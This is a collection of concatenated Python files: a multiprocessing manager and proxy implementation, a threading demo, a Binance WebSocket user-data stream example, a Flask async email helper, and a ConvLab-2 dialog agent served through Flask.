return ('\n' + '-'*75 + '\n' + str(self.args[0]) + '-'*75)
#
# Functions for finding the method names of an object
#
def all_methods(obj):
'''
Return a list of names of methods of `obj`
'''
temp = []
for name in dir(obj):
func = getattr(obj, name)
if callable(func):
temp.append(name)
return temp
def public_methods(obj):
'''
Return a list of names of methods of `obj` which do not start with '_'
'''
return [name for name in all_methods(obj) if name[0] != '_']
#
# Server which is run in a process controlled by a manager
#
class Server(object):
'''
Server class which runs in a process controlled by a manager object
'''
public = ['shutdown', 'create', 'accept_connection', 'get_methods',
'debug_info', 'number_of_objects', 'dummy', 'incref', 'decref']
def __init__(self, registry, address, authkey, serializer):
assert isinstance(authkey, bytes)
self.registry = registry
self.authkey = process.AuthenticationString(authkey)
Listener, Client = listener_client[serializer]
# do authentication later
self.listener = Listener(address=address, backlog=16)
self.address = self.listener.address
self.id_to_obj = {'0': (None, ())}
self.id_to_refcount = {}
self.mutex = threading.RLock()
def serve_forever(self):
'''
Run the server forever
'''
self.stop_event = threading.Event()
process.current_process()._manager_server = self
try:
accepter = threading.Thread(target=self.accepter)
accepter.daemon = True
accepter.start()
try:
while not self.stop_event.is_set():
self.stop_event.wait(1)
except (KeyboardInterrupt, SystemExit):
pass
finally:
if sys.stdout != sys.__stdout__:
util.debug('resetting stdout, stderr')
sys.stdout = sys.__stdout__
sys.stderr = sys.__stderr__
sys.exit(0)
def accepter(self):
while True:
try:
c = self.listener.accept()
except OSError:
continue
t = threading.Thread(target=self.handle_request, args=(c,))
t.daemon = True
t.start()
def handle_request(self, c):
'''
Handle a new connection
'''
funcname = result = request = None
try:
connection.deliver_challenge(c, self.authkey)
connection.answer_challenge(c, self.authkey)
request = c.recv()
ignore, funcname, args, kwds = request
assert funcname in self.public, '%r unrecognized' % funcname
func = getattr(self, funcname)
except Exception:
msg = ('#TRACEBACK', format_exc())
else:
try:
result = func(c, *args, **kwds)
except Exception:
msg = ('#TRACEBACK', format_exc())
else:
msg = ('#RETURN', result)
try:
c.send(msg)
except Exception as e:
try:
c.send(('#TRACEBACK', format_exc()))
except Exception:
pass
util.info('Failure to send message: %r', msg)
util.info(' ... request was %r', request)
util.info(' ... exception was %r', e)
c.close()
def serve_client(self, conn):
'''
Handle requests from the proxies in a particular process/thread
'''
util.debug('starting server thread to service %r',
threading.current_thread().name)
recv = conn.recv
send = conn.send
id_to_obj = self.id_to_obj
while not self.stop_event.is_set():
try:
methodname = obj = None
request = recv()
ident, methodname, args, kwds = request
obj, exposed, gettypeid = id_to_obj[ident]
if methodname not in exposed:
raise AttributeError(
'method %r of %r object is not in exposed=%r' %
(methodname, type(obj), exposed)
)
function = getattr(obj, methodname)
try:
res = function(*args, **kwds)
except Exception as e:
msg = ('#ERROR', e)
else:
typeid = gettypeid and gettypeid.get(methodname, None)
if typeid:
rident, rexposed = self.create(conn, typeid, res)
token = Token(typeid, self.address, rident)
msg = ('#PROXY', (rexposed, token))
else:
msg = ('#RETURN', res)
except AttributeError:
if methodname is None:
msg = ('#TRACEBACK', format_exc())
else:
try:
fallback_func = self.fallback_mapping[methodname]
result = fallback_func(
self, conn, ident, obj, *args, **kwds
)
msg = ('#RETURN', result)
except Exception:
msg = ('#TRACEBACK', format_exc())
except EOFError:
util.debug('got EOF -- exiting thread serving %r',
threading.current_thread().name)
sys.exit(0)
except Exception:
msg = ('#TRACEBACK', format_exc())
try:
try:
send(msg)
except Exception as e:
send(('#UNSERIALIZABLE', repr(msg)))
except Exception as e:
util.info('exception in thread serving %r',
threading.current_thread().name)
util.info(' ... message was %r', msg)
util.info(' ... exception was %r', e)
conn.close()
sys.exit(1)
def fallback_getvalue(self, conn, ident, obj):
return obj
def fallback_str(self, conn, ident, obj):
return str(obj)
def fallback_repr(self, conn, ident, obj):
return repr(obj)
fallback_mapping = {
'__str__':fallback_str,
'__repr__':fallback_repr,
'#GETVALUE':fallback_getvalue
}
def dummy(self, c):
pass
def debug_info(self, c):
'''
Return some info --- useful to spot problems with refcounting
'''
with self.mutex:
result = []
keys = list(self.id_to_obj.keys())
keys.sort()
for ident in keys:
if ident != '0':
result.append(' %s: refcount=%s\n %s' %
(ident, self.id_to_refcount[ident],
str(self.id_to_obj[ident][0])[:75]))
return '\n'.join(result)
def number_of_objects(self, c):
'''
Number of shared objects
'''
return len(self.id_to_obj) - 1 # don't count ident='0'
def shutdown(self, c):
'''
Shutdown this process
'''
try:
util.debug('manager received shutdown message')
c.send(('#RETURN', None))
except:
import traceback
traceback.print_exc()
finally:
self.stop_event.set()
def create(self, c, typeid, *args, **kwds):
'''
Create a new shared object and return its id
'''
with self.mutex:
callable, exposed, method_to_typeid, proxytype = \
self.registry[typeid]
if callable is None:
assert len(args) == 1 and not kwds
obj = args[0]
else:
obj = callable(*args, **kwds)
if exposed is None:
exposed = public_methods(obj)
if method_to_typeid is not None:
assert type(method_to_typeid) is dict
exposed = list(exposed) + list(method_to_typeid)
ident = '%x' % id(obj) # convert to string because xmlrpclib
# only has 32 bit signed integers
util.debug('%r callable returned object with id %r', typeid, ident)
self.id_to_obj[ident] = (obj, set(exposed), method_to_typeid)
if ident not in self.id_to_refcount:
self.id_to_refcount[ident] = 0
# increment the reference count immediately, to avoid
# this object being garbage collected before a Proxy
# object for it can be created. The caller of create()
# is responsible for doing a decref once the Proxy object
# has been created.
self.incref(c, ident)
return ident, tuple(exposed)
def get_methods(self, c, token):
'''
Return the methods of the shared object indicated by token
'''
return tuple(self.id_to_obj[token.id][1])
def accept_connection(self, c, name):
'''
Spawn a new thread to serve this connection
'''
threading.current_thread().name = name
c.send(('#RETURN', None))
self.serve_client(c)
def incref(self, c, ident):
with self.mutex:
self.id_to_refcount[ident] += 1
def decref(self, c, ident):
with self.mutex:
assert self.id_to_refcount[ident] >= 1
self.id_to_refcount[ident] -= 1
if self.id_to_refcount[ident] == 0:
del self.id_to_obj[ident], self.id_to_refcount[ident]
util.debug('disposing of obj with id %r', ident)
#
# Class to represent state of a manager
#
class State(object):
__slots__ = ['value']
INITIAL = 0
STARTED = 1
SHUTDOWN = 2
#
# Mapping from serializer name to Listener and Client types
#
listener_client = {
'pickle' : (connection.Listener, connection.Client),
'xmlrpclib' : (connection.XmlListener, connection.XmlClient)
}
#
# Definition of BaseManager
#
class BaseManager(object):
'''
Base class for managers
'''
_registry = {}
_Server = Server
def __init__(self, address=None, authkey=None, serializer='pickle',
ctx=None):
if authkey is None:
authkey = process.current_process().authkey
self._address = address # XXX not final address if eg ('', 0)
self._authkey = process.AuthenticationString(authkey)
self._state = State()
self._state.value = State.INITIAL
self._serializer = serializer
self._Listener, self._Client = listener_client[serializer]
self._ctx = ctx or get_context()
def get_server(self):
'''
Return server object with serve_forever() method and address attribute
'''
assert self._state.value == State.INITIAL
return Server(self._registry, self._address,
self._authkey, self._serializer)
def connect(self):
'''
Connect manager object to the server process
'''
Listener, Client = listener_client[self._serializer]
conn = Client(self._address, authkey=self._authkey)
dispatch(conn, None, 'dummy')
self._state.value = State.STARTED
def start(self, initializer=None, initargs=()):
'''
Spawn a server process for this manager object
'''
assert self._state.value == State.INITIAL
if initializer is not None and not callable(initializer):
raise TypeError('initializer must be a callable')
# pipe over which we will retrieve address of server
reader, writer = connection.Pipe(duplex=False)
# spawn process which runs a server
self._process = self._ctx.Process(
target=type(self)._run_server,
args=(self._registry, self._address, self._authkey,
self._serializer, writer, initializer, initargs),
)
ident = ':'.join(str(i) for i in self._process._identity)
self._process.name = type(self).__name__ + '-' + ident
self._process.start()
# get address of server
writer.close()
self._address = reader.recv()
reader.close()
# register a finalizer
self._state.value = State.STARTED
self.shutdown = util.Finalize(
self, type(self)._finalize_manager,
args=(self._process, self._address, self._authkey,
self._state, self._Client),
exitpriority=0
)
@classmethod
def _run_server(cls, registry, address, authkey, serializer, writer,
initializer=None, initargs=()):
'''
Create a server, report its address and run it
'''
if initializer is not None:
initializer(*initargs)
# create server
server = cls._Server(registry, address, authkey, serializer)
# inform parent process of the server's address
writer.send(server.address)
writer.close()
# run the manager
util.info('manager serving at %r', server.address)
server.serve_forever()
def _create(self, typeid, *args, **kwds):
'''
Create a new shared object; return the token and exposed tuple
'''
assert self._state.value == State.STARTED, 'server not yet started'
conn = self._Client(self._address, authkey=self._authkey)
try:
id, exposed = dispatch(conn, None, 'create', (typeid,)+args, kwds)
finally:
conn.close()
return Token(typeid, self._address, id), exposed
def join(self, timeout=None):
'''
Join the manager process (if it has been spawned)
'''
if self._process is not None:
self._process.join(timeout)
if not self._process.is_alive():
self._process = None
def _debug_info(self):
'''
        Return some info about the server's shared objects and connections
'''
conn = self._Client(self._address, authkey=self._authkey)
try:
return dispatch(conn, None, 'debug_info')
finally:
conn.close()
def _number_of_objects(self):
'''
Return the number of shared objects
'''
conn = self._Client(self._address, authkey=self._authkey)
try:
return dispatch(conn, None, 'number_of_objects')
finally:
conn.close()
def __enter__(self):
if self._state.value == State.INITIAL:
self.start()
assert self._state.value == State.STARTED
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.shutdown()
@staticmethod
def _finalize_manager(process, address, authkey, state, _Client):
'''
Shutdown the manager process; will be registered as a finalizer
'''
if process.is_alive():
util.info('sending shutdown message to manager')
try:
conn = _Client(address, authkey=authkey)
try:
dispatch(conn, None, 'shutdown')
finally:
conn.close()
except Exception:
pass
process.join(timeout=1.0)
if process.is_alive():
util.info('manager still alive')
if hasattr(process, 'terminate'):
util.info('trying to `terminate()` manager process')
process.terminate()
process.join(timeout=0.1)
if process.is_alive():
util.info('manager still alive after terminate')
state.value = State.SHUTDOWN
try:
del BaseProxy._address_to_local[address]
except KeyError:
pass
address = property(lambda self: self._address)
@classmethod
def register(cls, typeid, callable=None, proxytype=None, exposed=None,
method_to_typeid=None, create_method=True):
'''
Register a typeid with the manager type
'''
if '_registry' not in cls.__dict__:
cls._registry = cls._registry.copy()
if proxytype is None:
proxytype = AutoProxy
exposed = exposed or getattr(proxytype, '_exposed_', None)
method_to_typeid = method_to_typeid or \
getattr(proxytype, '_method_to_typeid_', None)
if method_to_typeid:
for key, value in list(method_to_typeid.items()):
assert type(key) is str, '%r is not a string' % key
assert type(value) is str, '%r is not a string' % value
cls._registry[typeid] = (
callable, exposed, method_to_typeid, proxytype
)
if create_method:
def temp(self, *args, **kwds):
util.debug('requesting creation of a shared %r object', typeid)
token, exp = self._create(typeid, *args, **kwds)
proxy = proxytype(
token, self._serializer, manager=self,
authkey=self._authkey, exposed=exp
)
conn = self._Client(token.address, authkey=self._authkey)
dispatch(conn, None, 'decref', (token.id,))
return proxy
temp.__name__ = typeid
setattr(cls, typeid, temp)
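# A minimal usage sketch for register() (illustrative only: Calculator and
# MathsManager are hypothetical names, not part of this module):
#
#     class Calculator:
#         def add(self, a, b):
#             return a + b
#
#     class MathsManager(BaseManager):
#         pass
#
#     MathsManager.register('Calculator', Calculator)
#
#     if __name__ == '__main__':
#         with MathsManager() as manager:
#             calc = manager.Calculator()      # AutoProxy to a server-side Calculator
#             assert calc.add(2, 3) == 5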
#
# Subclass of set which get cleared after a fork
#
class ProcessLocalSet(set):
def __init__(self):
util.register_after_fork(self, lambda obj: obj.clear())
def __reduce__(self):
return type(self), ()
#
# Definition of BaseProxy
#
class BaseProxy(object):
'''
A base for proxies of shared objects
'''
_address_to_local = {}
_mutex = util.ForkAwareThreadLock()
def __init__(self, token, serializer, manager=None,
authkey=None, exposed=None, incref=True):
with BaseProxy._mutex:
tls_idset = BaseProxy._address_to_local.get(token.address, None)
if tls_idset is None:
tls_idset = util.ForkAwareLocal(), ProcessLocalSet()
BaseProxy._address_to_local[token.address] = tls_idset
# self._tls is used to record the connection used by this
# thread to communicate with the manager at token.address
self._tls = tls_idset[0]
# self._idset is used to record the identities of all shared
# objects for which the current process owns references and
# which are in the manager at token.address
self._idset = tls_idset[1]
self._token = token
self._id = self._token.id
self._manager = manager
self._serializer = serializer
self._Client = listener_client[serializer][1]
if authkey is not None:
self._authkey = process.AuthenticationString(authkey)
elif self._manager is not None:
self._authkey = self._manager._authkey
else:
self._authkey = process.current_process().authkey
if incref:
self._incref()
util.register_after_fork(self, BaseProxy._after_fork)
def _connect(self):
util.debug('making connection to manager')
name = process.current_process().name
if threading.current_thread().name != 'MainThread':
name += '|' + threading.current_thread().name
conn = self._Client(self._token.address, authkey=self._authkey)
dispatch(conn, None, 'accept_connection', (name,))
self._tls.connection = conn
def _callmethod(self, methodname, args=(), kwds={}):
'''
        Try to call a method of the referent and return a copy of the result
'''
try:
conn = self._tls.connection
except AttributeError:
util.debug('thread %r does not own a connection',
threading.current_thread().name)
self._connect()
conn = self._tls.connection
conn.send((self._id, methodname, args, kwds))
kind, result = conn.recv()
if kind == '#RETURN':
return result
elif kind == '#PROXY':
exposed, token = result
proxytype = self._manager._registry[token.typeid][-1]
token.address = self._token.address
proxy = proxytype(
token, self._serializer, manager=self._manager,
authkey=self._authkey, exposed=exposed
)
conn = self._Client(token.address, authkey=self._authkey)
dispatch(conn, None, 'decref', (token.id,))
return proxy
raise convert_to_error(kind, result)
def _getvalue(self):
'''
Get a copy of the value of the referent
'''
return self._callmethod('#GETVALUE')
def _incref(self):
conn = self._Client(self._token.address, authkey=self._authkey)
dispatch(conn, None, 'incref', (self._id,))
util.debug('INCREF %r', self._token.id)
self._idset.add(self._id)
state = self._manager and self._manager._state
self._close = util.Finalize(
self, BaseProxy._decref,
args=(self._token, self._authkey, state,
self._tls, self._idset, self._Client),
exitpriority=10
)
@staticmethod
def _decref(token, authkey, state, tls, idset, _Client):
idset.discard(token.id)
# check whether manager is still alive
if state is None or state.value == State.STARTED:
# tell manager this process no longer cares about referent
try:
util.debug('DECREF %r', token.id)
conn = _Client(token.address, authkey=authkey)
dispatch(conn, None, 'decref', (token.id,))
except Exception as e:
util.debug('... decref failed %s', e)
else:
util.debug('DECREF %r -- manager already shutdown', token.id)
# check whether we can close this thread's connection because
# the process owns no more references to objects for this manager
if not idset and hasattr(tls, 'connection'):
util.debug('thread %r has no more proxies so closing conn',
threading.current_thread().name)
tls.connection.close()
del tls.connection
def _after_fork(self):
self._manager = None
try:
self._incref()
except Exception as e:
# the proxy may just be for a manager which has shutdown
util.info('incref failed: %s' % e)
def __reduce__(self):
kwds = {}
if context.get_spawning_popen() is not None:
kwds['authkey'] = self._authkey
if getattr(self, '_isauto', False):
kwds['exposed'] = self._exposed_
return (RebuildProxy,
(AutoProxy, self._token, self._serializer, kwds))
else:
return (RebuildProxy,
(type(self), self._token, self._serializer, kwds))
def __deepcopy__(self, memo):
return self._getvalue()
def __repr__(self):
return '<%s object, typeid %r at %#x>' % \
(type(self).__name__, self._token.typeid, id(self))
def __str__(self):
'''
Return representation of the referent (or a fall-back if that fails)
'''
try:
return self._callmethod('__repr__')
except Exception:
return repr(self)[:-1] + "; '__str__()' failed>"
#
# Function used for unpickling
#
def RebuildProxy(func, token, serializer, kwds):
'''
Function used for unpickling proxy objects.
If possible the shared object is returned, or otherwise a proxy for it.
'''
server = getattr(process.current_process(), '_manager_server', None)
if server and server.address == token.address:
return server.id_to_obj[token.id][0]
else:
incref = (
kwds.pop('incref', True) and
not getattr(process.current_process(), '_inheriting', False)
)
return func(token, serializer, incref=incref, **kwds)
#
# Functions to create proxies and proxy types
#
def MakeProxyType(name, exposed, _cache={}):
'''
    Return a proxy type whose methods are given by `exposed`
'''
exposed = tuple(exposed)
try:
return _cache[(name, exposed)]
except KeyError:
pass
dic = {}
for meth in exposed:
exec('''def %s(self, *args, **kwds):
return self._callmethod(%r, args, kwds)''' % (meth, meth), dic)
ProxyType = type(name, (BaseProxy,), dic)
ProxyType._exposed_ = exposed
_cache[(name, exposed)] = ProxyType
return ProxyType
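# For example (illustrative), MakeProxyType('FooProxy', ('bar',)) builds a BaseProxy
# subclass whose generated method simply forwards to the referent:
#
#     def bar(self, *args, **kwds):
#         return self._callmethod('bar', args, kwds)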
def AutoProxy(token, serializer, manager=None, authkey=None,
exposed=None, incref=True):
'''
Return an auto-proxy for `token`
'''
_Client = listener_client[serializer][1]
if exposed is None:
conn = _Client(token.address, authkey=authkey)
try:
exposed = dispatch(conn, None, 'get_methods', (token,))
finally:
conn.close()
if authkey is None and manager is not None:
authkey = manager._authkey
if authkey is None:
authkey = process.current_process().authkey
ProxyType = MakeProxyType('AutoProxy[%s]' % token.typeid, exposed)
proxy = ProxyType(token, serializer, manager=manager, authkey=authkey,
incref=incref)
proxy._isauto = True
return proxy
#
# Types/callables which we will register with SyncManager
#
class Namespace(object):
def __init__(self, **kwds):
self.__dict__.update(kwds)
def __repr__(self):
items = list(self.__dict__.items())
temp = []
for name, value in items:
if not name.startswith('_'):
temp.append('%s=%r' % (name, value))
temp.sort()
return '%s(%s)' % (self.__class__.__name__, ', '.join(temp))
class Value(object):
def __init__(self, typecode, value, lock=True):
self._typecode = typecode
self._value = value
def get(self):
return self._value
def set(self, value):
self._value = value
def __repr__(self):
return '%s(%r, %r)'%(type(self).__name__, self._typecode, self._value)
value = property(get, set)
def Array(typecode, sequence, lock=True):
return array.array(typecode, sequence)
#
# Proxy types used by SyncManager
#
class IteratorProxy(BaseProxy):
_exposed_ = ('__next__', 'send', 'throw', 'close')
def __iter__(self):
return self
def __next__(self, *args):
return self._callmethod('__next__', args)
def send(self, *args):
return self._callmethod('send', args)
def throw(self, *args):
return self._callmethod('throw', args)
def close(self, *args):
return self._callmethod('close', args)
class AcquirerProxy(BaseProxy):
_exposed_ = ('acquire', 'release')
def acquire(self, blocking=True, timeout=None):
args = (blocking,) if timeout is None else (blocking, timeout)
return self._callmethod('acquire', args)
def release(self):
return self._callmethod('release')
def __enter__(self):
return self._callmethod('acquire')
def __exit__(self, exc_type, exc_val, exc_tb):
return self._callmethod('release')
class ConditionProxy(AcquirerProxy):
_exposed_ = ('acquire', 'release', 'wait', 'notify', 'notify_all')
def wait(self, timeout=None):
return self._callmethod('wait', (timeout,))
def notify(self):
return self._callmethod('notify')
def notify_all(self):
return self._callmethod('notify_all')
def wait_for(self, predicate, timeout=None):
result = predicate()
if result:
return result
if timeout is not None:
endtime = _time() + timeout
else:
endtime = None
waittime = None
while not result:
if endtime is not None:
waittime = endtime - _time()
if waittime <= 0:
break
self.wait(waittime)
result = predicate()
return result
class EventProxy(BaseProxy):
_exposed_ = ('is_set', 'set', 'clear', 'wait')
def is_set(self):
return self._callmethod('is_set')
def set(self):
return self._callmethod('set')
def clear(self):
return self._callmethod('clear')
def wait(self, timeout=None):
return self._callmethod('wait', (timeout,))
class BarrierProxy(BaseProxy):
_exposed_ = ('__getattribute__', 'wait', 'abort', 'reset')
def wait(self, timeout=None):
return self._callmethod('wait', (timeout,))
def abort(self):
return self._callmethod('abort')
def reset(self):
return self._callmethod('reset')
@property
def parties(self):
return self._callmethod('__getattribute__', ('parties',))
@property
def n_waiting(self):
return self._callmethod('__getattribute__', ('n_waiting',))
@property
def broken(self):
return self._callmethod('__getattribute__', ('broken',))
class NamespaceProxy(BaseProxy):
_exposed_ = ('__getattribute__', '__setattr__', '__delattr__')
def __getattr__(self, key):
if key[0] == '_':
return object.__getattribute__(self, key)
callmethod = object.__getattribute__(self, '_callmethod')
return callmethod('__getattribute__', (key,))
def __setattr__(self, key, value):
if key[0] == '_':
return object.__setattr__(self, key, value)
callmethod = object.__getattribute__(self, '_callmethod')
return callmethod('__setattr__', (key, value))
def __delattr__(self, key):
if key[0] == '_':
return object.__delattr__(self, key)
callmethod = object.__getattribute__(self, '_callmethod')
return callmethod('__delattr__', (key,))
class ValueProxy(BaseProxy):
_exposed_ = ('get', 'set')
def get(self):
return self._callmethod('get')
def set(self, value):
return self._callmethod('set', (value,))
value = property(get, set)
BaseListProxy = MakeProxyType('BaseListProxy', (
'__add__', '__contains__', '__delitem__', '__getitem__', '__len__',
'__mul__', '__reversed__', '__rmul__', '__setitem__',
'append', 'count', 'extend', 'index', 'insert', 'pop', 'remove',
'reverse', 'sort', '__imul__'
))
class ListProxy(BaseListProxy):
def __iadd__(self, value):
self._callmethod('extend', (value,))
return self
def __imul__(self, value):
self._callmethod('__imul__', (value,))
return self
DictProxy = MakeProxyType('DictProxy', (
'__contains__', '__delitem__', '__getitem__', '__len__',
'__setitem__', 'clear', 'copy', 'get', 'has_key', 'items',
'keys', 'pop', 'popitem', 'setdefault', 'update', 'values'
))
ArrayProxy = MakeProxyType('ArrayProxy', (
'__len__', '__getitem__', '__setitem__'
))
BasePoolProxy = MakeProxyType('PoolProxy', (
'apply', 'apply_async', 'close', 'imap', 'imap_unordered', 'join',
'map', 'map_async', 'starmap', 'starmap_async', 'terminate',
))
BasePoolProxy._method_to_typeid_ = {
'apply_async': 'AsyncResult',
'map_async': 'AsyncResult',
'starmap_async': 'AsyncResult',
'imap': 'Iterator',
'imap_unordered': 'Iterator'
}
class PoolProxy(BasePoolProxy):
def __enter__(self):
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.terminate()
#
# Definition of SyncManager
#
class SyncManager(BaseManager):
'''
Subclass of `BaseManager` which supports a number of shared object types.
The types registered are those intended for the synchronization
of threads, plus `dict`, `list` and `Namespace`.
The `multiprocessing.Manager()` function creates started instances of
this class.
'''
SyncManager.register('Queue', queue.Queue)
SyncManager.register('JoinableQueue', queue.Queue)
SyncManager.register('Event', threading.Event, EventProxy)
SyncManager.register('Lock', threading.Lock, AcquirerProxy)
SyncManager.register('RLock', threading.RLock, AcquirerProxy)
SyncManager.register('Semaphore', threading.Semaphore, AcquirerProxy)
SyncManager.register('BoundedSemaphore', threading.BoundedSemaphore,
AcquirerProxy)
SyncManager.register('Condition', threading.Condition, ConditionProxy)
SyncManager.register('Barrier', threading.Barrier, BarrierProxy)
SyncManager.register('Pool', pool.Pool, PoolProxy)
SyncManager.register('list', list, ListProxy)
SyncManager.register('dict', dict, DictProxy)
SyncManager.register('Value', Value, ValueProxy)
SyncManager.register('Array', Array, ArrayProxy)
SyncManager.register('Namespace', Namespace, NamespaceProxy)
# types returned by methods of PoolProxy
SyncManager.register('Iterator', proxytype=IteratorProxy, create_method=False)
SyncManager.register('AsyncResult', create_method=False)
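# A minimal usage sketch of the registrations above, kept as comments so that
# importing this module stays side-effect free:
#
#     if __name__ == '__main__':
#         with SyncManager() as manager:
#             d = manager.dict()        # DictProxy backed by the manager's server process
#             lock = manager.Lock()     # AcquirerProxy, usable as a context manager
#             with lock:
#                 d['answer'] = 42
#             print(d.get('answer'))    # -> 42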
|
multithread.py
|
import threading
import time
def long_time_task(i):
print('Current sub_thread: {} Task {}'.format(threading.current_thread().name, i))
time.sleep(2)
print("Result: {}".format(8 ** 20))
if __name__ == '__main__':
start = time.time()
print('This is main thread:{}'.format(threading.current_thread().name))
thread_list = []
for i in range(1, 3):
t = threading.Thread(target=long_time_task, args=(i, ))
thread_list.append(t)
for t in thread_list:
t.start()
for t in thread_list:
t.join()
end = time.time()
print("Totally used {} seconds".format((end - start)))
|
example_userdata_stream_new_style.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# File: example_userdata_stream_new_style.py
#
# Part of ‘UNICORN Binance WebSocket API’
# Project website: https://github.com/LUCIT-Systems-and-Development/unicorn-binance-websocket-api
# Documentation: https://lucit-systems-and-development.github.io/unicorn-binance-websocket-api
# PyPI: https://pypi.org/project/unicorn-binance-websocket-api/
#
# Author: LUCIT Systems and Development
#
# Copyright (c) 2019-2022, LUCIT Systems and Development (https://www.lucit.tech) and Oliver Zehentleitner
# All rights reserved.
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish, dis-
# tribute, sublicense, and/or sell copies of the Software, and to permit
# persons to whom the Software is furnished to do so, subject to the fol-
# lowing conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABIL-
# ITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT
# SHALL THE AUTHOR BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
from unicorn_binance_websocket_api.manager import BinanceWebSocketApiManager
import logging
import time
import threading
import os
logging.getLogger("unicorn_binance_websocket_api.unicorn_binance_websocket_api_manager")
logging.basicConfig(level=logging.INFO,
filename=os.path.basename(__file__) + '.log',
format="{asctime} [{levelname:8}] {process} {thread} {module}: {message}",
style="{")
def print_stream_data_from_stream_buffer(binance_websocket_api_manager):
while True:
if binance_websocket_api_manager.is_manager_stopping():
exit(0)
oldest_stream_data_from_stream_buffer = binance_websocket_api_manager.pop_stream_data_from_stream_buffer()
if oldest_stream_data_from_stream_buffer is False:
time.sleep(0.01)
else:
print(oldest_stream_data_from_stream_buffer)
# configure api key and secret for binance.com
api_key = ""
api_secret = ""
# create an instance of BinanceWebSocketApiManager
ubwa_com = BinanceWebSocketApiManager(exchange="binance.com")
# create the userData stream
user_stream_id = ubwa_com.create_stream('arr', '!userData', api_key=api_key, api_secret=api_secret)
# start a worker thread to move the received stream_data from the stream_buffer to a print function
worker_thread = threading.Thread(target=print_stream_data_from_stream_buffer, args=(ubwa_com,))
worker_thread.start()
# configure api key and secret for binance.com Isolated Margin
api_key = ""
api_secret = ""
# create an instance of BinanceWebSocketApiManager
ubwa_com_im = BinanceWebSocketApiManager(exchange="binance.com-isolated_margin")
# create the userData stream
user_stream_id_im = ubwa_com_im.create_stream('arr', '!userData', symbols="trxbtc", api_key=api_key, api_secret=api_secret)
# start a worker thread to move the received stream_data from the stream_buffer to a print function
worker_thread = threading.Thread(target=print_stream_data_from_stream_buffer, args=(ubwa_com_im,))
worker_thread.start()
# monitor the streams
while True:
ubwa_com.print_stream_info(user_stream_id)
ubwa_com_im.print_stream_info(user_stream_id_im)
time.sleep(1)
|
email.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Tue Dec 29 15:35:50 2020
@author: rohithbhandaru
"""
from threading import Thread
from flask import current_app
from flask_mail import Message
from . import mail
def send_async_email(appContext, msg):
with appContext.app_context():
mail.send(msg)
def send_email(subject, sender, recipients, text_body, html_body):
app = current_app._get_current_object()
msg = Message(subject, sender=sender, recipients=recipients)
msg.body = text_body
msg.html = html_body
Thread(target=send_async_email, args=(app, msg)).start()
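A hypothetical caller for send_email(), written as if it were appended to this module; the blueprint name, route and addresses are illustrative, and the application is assumed to have Flask-Mail configured:

from flask import Blueprint

notifications = Blueprint('notifications', __name__)  # hypothetical blueprint

@notifications.route('/signup-demo')
def signup_demo():
    # send_email() returns immediately; the actual send happens on the background thread
    send_email(
        subject='Welcome!',
        sender='no-reply@example.com',
        recipients=['new.user@example.com'],
        text_body='Thanks for signing up.',
        html_body='<p>Thanks for signing up.</p>',
    )
    return 'email queued', 202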
|
run_agent.py
|
import sys
import os
import numpy as np
import copy
from flask import Flask, request, jsonify
from queue import PriorityQueue
from threading import Thread
# Agent
from convlab2.dialog_agent import PipelineAgent, BiSession
from convlab2.nlu.milu.multiwoz import MILU
from convlab2.dst.rule.multiwoz import RuleDST
from convlab2.policy.rule.multiwoz import RulePolicy
from convlab2.nlg.template.multiwoz import TemplateNLG
from convlab2.evaluator.multiwoz_eval import MultiWozEvaluator
import random
from pprint import pprint
rgi_queue = PriorityQueue(maxsize=0)
rgo_queue = PriorityQueue(maxsize=0)
app = Flask(__name__)
sys_nlu = MILU()
sys_dst = RuleDST()
sys_policy = RulePolicy(character='sys')
sys_nlg = TemplateNLG(is_user=False)
agent = PipelineAgent(sys_nlu, sys_dst, sys_policy, sys_nlg, 'sys')
print(agent.response('I am looking for a hotel'))
@app.route('/', methods=['GET', 'POST'])
def process():
try:
in_request = request.json
print(in_request)
    except Exception:
        # request.json failed, so in_request was never bound; report the raw body instead
        return "invalid input: {}".format(request.data)
rgi_queue.put(in_request)
rgi_queue.join()
output = rgo_queue.get()
print(output['response'])
rgo_queue.task_done()
# return jsonify({'response': response})
return jsonify(output)
def generate_response(in_queue, out_queue):
while True:
# pop input
last_action = 'null'
in_request = in_queue.get()
obs = in_request['input']
if in_request['agent_state'] == {}:
agent.init_session()
else:
encoded_state, dst_state, last_action = in_request['agent_state']
agent.dst.state = copy.deepcopy(dst_state)
try:
action = agent.response(obs)
print(f'obs:{obs}; action:{action}')
dst_state = copy.deepcopy(agent.dst.state)
encoded_state = None
except Exception as e:
print('agent error', e)
try:
if action == '':
response = 'Sorry I do not understand, can you paraphrase?'
else:
response = action
except Exception as e:
print('Response generation error', e)
response = 'What did you say?'
last_action = action
out_queue.put({'response': response, 'agent_state': (encoded_state, dst_state, last_action)})
in_queue.task_done()
out_queue.join()
if __name__ == '__main__':
worker = Thread(target=generate_response, args=(rgi_queue, rgo_queue,))
    worker.daemon = True
worker.start()
app.run(host='0.0.0.0', port=10004)
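A possible client for the Flask service above; the payload keys ('input', 'agent_state') and port 10004 mirror what the code above uses, while the localhost host and the requests dependency are assumptions for illustration:

import requests

AGENT_URL = 'http://localhost:10004/'

def chat(utterance, agent_state=None):
    payload = {'input': utterance, 'agent_state': agent_state if agent_state is not None else {}}
    reply = requests.post(AGENT_URL, json=payload).json()
    # the service returns the updated agent_state so it can be passed back on the next turn
    return reply['response'], reply['agent_state']

if __name__ == '__main__':
    response, state = chat('I am looking for a hotel')
    print(response)
    response, state = chat('Something cheap in the centre, please', state)
    print(response)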
|
event_processor.py
|
# --------------------------------------------------------------------------------------------
